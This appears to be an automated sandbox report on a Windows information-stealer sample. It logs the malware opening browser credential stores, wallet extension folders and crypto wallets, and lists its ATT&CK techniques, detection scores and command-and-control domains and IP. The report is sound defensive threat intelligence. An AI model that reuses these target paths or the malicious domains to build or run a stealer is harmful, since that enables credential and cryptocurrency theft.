              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: Yara match; File source: 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2279583257.000000000283E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR
              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK matrix (techniques grouped by tactic; the numeric prefixes shown in the original matrix are kept in parentheses)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
              Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (12); Process Injection (311); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1)
              Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (12); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (12); Wi-Fi Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (31); Clipboard Data (2); Keylogging; GUI Input Capture
              Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

              Source | Detection | Scanner | Label
              6xmBUtHylU.exe | 42% | ReversingLabs | Win64.Trojan.Smokeloader
              6xmBUtHylU.exe | 30% | Virustotal |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              citizencenturygoodwk.shop | 10% | Virustotal |
              Source | Detection | Scanner | Label
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
              http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
              http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
              http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
              https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/api9( | 0% | Avira URL Cloud | safe
              https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/ez | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/api=/ | 0% | Avira URL Cloud | safe
              radiationnopp.shop | 0% | Avira URL Cloud | safe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/. | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/apiU6 | 0% | Avira URL Cloud | safe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
              http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
              https://login.microsoftonline.com/stream | 0% | Avira URL Cloud | safe
              publicitttyps.shop | 0% | Avira URL Cloud | safe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | Avira URL Cloud | safe
              answerrsdo.shop | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop:443/api | 100% | Avira URL Cloud | malware
              citizencenturygoodwk.shop | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/apiX | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/apie6- | 0% | Avira URL Cloud | safe
              benchillppwo.shop | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/z | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/ | 0% | Avira URL Cloud | safe
              https://management.core.chinacloudapi.cnFrame | 0% | Avira URL Cloud | safe
              bargainnykwo.shop | 0% | Avira URL Cloud | safe
              bouncedgowp.shop | 0% | Avira URL Cloud | safe
              https://management.chinacloudapi.cnCONTINUATION | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/api | 100% | Avira URL Cloud | malware
              https://citizencenturygoodwk.shop/4Y | 0% | Avira URL Cloud | safe
              bannngwko.shop | 0% | Avira URL Cloud | safe
              https://management.core.usgovcloudapi.nethttp2: | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop:443/apiK | 0% | Avira URL Cloud | safe
              https://management.azure.cominvalid | 0% | Avira URL Cloud | safe
              https://login.chinacloudapi.cn/http2: | 0% | Avira URL Cloud | safe
              affecthorsedpo.shop | 0% | Avira URL Cloud | safe
              https://support.mozilla.org/products/firefoxgro.all | 0% | Avira URL Cloud | safe
              https://citizencenturygoodwk.shop/apiP | 0% | Avira URL Cloud | safe
              https://www.mozilla.or | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              citizencenturygoodwk.shop | 188.114.96.3 | true | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              radiationnopp.shop | true | Avira URL Cloud: safe | unknown
              publicitttyps.shop | true | Avira URL Cloud: safe | unknown
              answerrsdo.shop | true | Avira URL Cloud: safe | unknown
              citizencenturygoodwk.shop | true | Avira URL Cloud: safe | unknown
              benchillppwo.shop | true | Avira URL Cloud: safe | unknown
              bargainnykwo.shop | true | Avira URL Cloud: safe | unknown
              bouncedgowp.shop | true | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/api | true | Avira URL Cloud: malware | unknown
              bannngwko.shop | true | Avira URL Cloud: safe | unknown
              affecthorsedpo.shop | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://duckduckgo.com/chrome_newtab | BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/api=/ | BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/ez | BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://duckduckgo.com/ac/?q= | BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/api9( | BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/. | BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://citizencenturygoodwk.shop/apiU6 | BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              http://ocsp.rootca1.amazontrust.com0: | BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://login.microsoftonline.com/stream | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://citizencenturygoodwk.shop:443/api | BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002823000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
              https://citizencenturygoodwk.shop/apiX | BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002871000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/apie6- | BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/z | BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://management.core.chinacloudapi.cnFrame | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/ | BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://management.chinacloudapi.cnCONTINUATION | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              https://management.core.usgovcloudapi.nethttp2: | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              http://x1.c.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://x1.i.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://crt.rootca1.amazontrust.com/rootca1.cer0? | BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://citizencenturygoodwk.shop/4Y | BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop:443/apiK | BitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://management.azure.cominvalid | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              https://login.chinacloudapi.cn/http2: | 6xmBUtHylU.exe | false | Avira URL Cloud: safe | unknown
              https://support.mozilla.org/products/firefoxgro.all | BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://citizencenturygoodwk.shop/apiP | BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
              https://www.mozilla.or | BitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              188.114.96.3 | citizencenturygoodwk.shop | European Union | 13335 | CLOUDFLARENETUS | true
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1467945
              Start date and time:2024-07-05 06:02:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 11s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:6xmBUtHylU.exe
              renamed because original name is a hash value
              Original Sample Name:b82c80a3ce9b5c44391d3f11307f8b8e.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 51%
              • Number of executed functions: 28
              • Number of non-executed functions: 47
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target 6xmBUtHylU.exe, PID 6552 because there are no executed functions
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              Time | Type | Description
              00:03:09 | API Interceptor | 8x Sleep call for process: BitLockerToGo.exe modified
              Match: 188.114.96.3
              Associated Sample Name / URL | Detection | Threat Name | Context
              http://www.telegramkv.com/ | malicious | Unknown | www.telegramkv.com/
              Scan405.exe | malicious | FormBook | www.jjjw.xyz/ypml/
              AuT5pFGTFw.exe | malicious | FormBook | www.coinwab.com/efdt/
              http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/ | malicious | HTMLPhisher | business.ifbsmetaiidentiityconfirms.com/favicon.ico
              BL Draft.exe | malicious | FormBook | www.ediancai.cn/x7r2/
              QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/btd2ptah/download
              Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | malicious | FormBook | www.ad14.fun/oc7s/
              spec 4008670601 AZTEK Order.exe | malicious | FormBook | www.ad14.fun/oc7s/
              9098393827383039.exe | malicious | FormBook | www.coinwab.com/kqqj/
              SOA 020724.exe | malicious | FormBook | www.ad14.fun/az6h/?Vn=Ydx4qJJ0n&3jJlx=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbOxuABFq0Im2Ecm9EQ8GOdhogxDCvRrrALITlDFg7ZHNgcXHQPxMcHnGf
              No context
              Match: CLOUDFLARENETUS
              Associated Sample Name / URL | Detection | Threat Name | Context
              XX(1).exe | malicious | AgentTesla, PureLog Stealer | 172.67.74.152
              OVER DUE INVOICE PAYMENT.docx | malicious | Snake Keylogger | 188.114.96.3
              https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU= | malicious | HTMLPhisher | 104.17.2.184
              Ship Docs_CI PL HBL COO_.exe | malicious | AgentTesla | 104.26.12.205
              https://rb.gy/zsqpja | malicious | HTMLPhisher | 104.17.2.184
              https://singingfiles.com/show.php?l=0&u=2156442&id=64574 | malicious | Unknown | 188.114.97.3
